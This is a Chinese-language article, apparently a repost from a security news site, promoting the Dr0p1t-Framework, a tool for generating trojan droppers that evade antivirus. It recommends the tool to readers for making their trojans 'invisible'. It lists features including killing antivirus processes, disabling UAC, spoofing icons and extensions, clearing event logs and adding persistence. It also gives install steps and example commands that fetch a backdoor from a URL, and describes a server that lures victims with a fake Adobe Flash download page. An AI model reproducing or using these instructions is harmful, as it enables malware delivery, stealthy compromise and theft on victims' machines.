相信对木马病毒有一定了解的人,一定听说过Trojan dropper。这是一种会在你的计算机上,释放和下载其他恶意软件的木马程序。作为一种较为典型的木马,它也极易遭到杀毒软件的查杀。那么有没有办法让我们的木马“隐身”呢?这里我向大家推荐一款叫做Dr0p1t的框架,利用它我们可以轻松地创建一个可以躲避大多数杀软的dropper程序。

特点

生成的可执行文件相关属性:

  • 可执行文件的大小相对于其他以相同方式生成的dropper较小。
  • 可在目标系统上下载可执行文件并静默执行
  • 自毁功能,dropper在完成工作后将自动删除
  • 躲避磁盘取证,并且在完全删除之前进行内容的清除
  • 完成后清除事件日志。

框架属性:

  • 适用于Windows,Linux,现已支持OSX(感谢@sm4sh3r)。
  • Dr0p1t-Server(beta版)支持在浏览器使用,具体请参阅如何使用Dr0p1t-Server
  • Dr0p1t-Server(beta版)有一个scam选项,具体请参阅如何使用Dr0p1t-Server

模块:

  • 在正式运行恶意软件之前,会主动搜索并尝试强制关闭杀毒软件进程。
  • 禁用UAC。
  • 以管理员身份运行恶意软件。
  • 伪装任意的文件图标及扩展。
  • 支持ZIP格式,可在上传可执行文件之前将其压缩为ZIP文件。
  • 在运行可执行文件之前可自定义选择文件类型如(batch | powershell | vbs)。
  • 可以绕过PowerShell执行策略。
  • 创建后使用UPX压缩dropper。

持久性模块:

  • 将下载后的可执行文件自动添加到开机启动项。
  • 将下载的可执行文件添加到计划任务中(UAC可忽略)。
  • 将你的文件添加到powershell用户配置文件,以便你可以随时下载和运行文件。

界面截图

Windows

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

Linux (Kali linux)

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

OSX

还没有完全测试! 需要一些贡献者和测试人员。

帮助菜单:

Usage: Dr0p1t.py Malware_Url [Options] options: -h, --help      显示帮助信息和退出 -s              添加恶意软件到启动项(持久的) -t              添加恶意软件到计划任务中(持久的) -a              添加链接到powershell用户配置文件(持久的) -k              在运行恶意软件之前强制关闭杀毒软件进程 -b              运行batch脚本之前运行你的恶意软件。检测脚本文件夹 -p              运行powershell脚本之前运行你的恶意软件。检测脚本文件夹 -v              运行vbs脚本之前运行你的恶意软件。检测脚本文件夹 --runas         绕过UAC以admin身份运行恶意软件 --spoof         文件扩展名欺骗 --zip           告诉Dr0p1t链接中的恶意软件被压缩为zip --upx           创建后使用UPX压缩 --nouac         尝试在受害者设备上取消UAC支持 -i              文件图标欺骗。检测图标文件夹 --noclearevent  告诉框架不要在目标机器上完成任务后清除事件日志 --nocompile     告诉框架不编译最终文件。 --only32        仅下载32位设备的恶意软件 --only64        仅下载64位设备的恶意软件 -q              Stay quite ( 无banner信息 ) -u              检查更新 -nd             显示较少的输出信息 

 举例:

./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx ./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32 ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas ./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

安装条件

Python 2或Python 3

如果是Python 2推荐使用2.7.x版本,如果是Python 3推荐使用3.5.x版本,这里注意不要使用3.6版,因为该版本目前还不支持PyInstaller。

Linux依赖

apt

其它依赖文件可以通过install.sh脚本安装

注:必须以root权限操作

windows依赖

pip

windows_requirements.txt中的模块

安装

Linux

git clone https://github.com/D4Vinci/Dr0p1t-Framework.git chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py

Windows(下载ZIP后解压缩)

cd Dr0p1t-Framework-master python -m pip install -r windows_requirements.txt python Dr0p1t.py

注:在python 2.7中你没有pip,因此需要先从get-pip.py脚本安装它[Google可以找到]

测试系统:

  • Kali Linux – SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Dr0p1t-Server

注:Dr0p1t-Server仍处在测试版阶段,有很多功能和设计需要大家一起添加和完善。

安装条件

稳定的互联网连接。

5000端口未被占用,并且防火墙配置为不阻止。

安装及运行server

在Linux和Windows上,通过执行上述步骤安装Dr0p1t后,我们使用以下命令安装server_requirements.txt中的模块:

python -m pip install -r server_requirements.txt

现在我们来运行我们的server脚本:

python Dr0p1t_Server.py

运行server脚本后,它将使用flask开始监听5000端口所有的通讯连接。

现在,我们就可以在浏览器中打开127.0.0.1:5000或[你的IP]:5000。

要从LAN中的其他设备打开[您的本地IP]:5000,并且WAN中的其他设备打开[全局IP]:5000,但请确保首先配置路由器以将端口5000连接转发给您。

注:如果想要在本地局域网内的其他设备[你的本地IP]:5000或无线局域网中的其他设备[全局IP]:5000打开,请首先确保你的路由器以配置端口转发。

打开server页面后,我们将看到一个设计简洁的数据提交界面。我们只需根据提示输入相应的内容即可。输入完成后我们点击提交,程序将为我们生成一个exe文件,并将我们重定向到一个虚假的Adobe Flash下载页面。

界面截图

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

查看更多关于Windows的截图

查看更多关于Linux的截图

virus total扫描结果:

Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架

*参考来源:Github,FB小编 secist 编译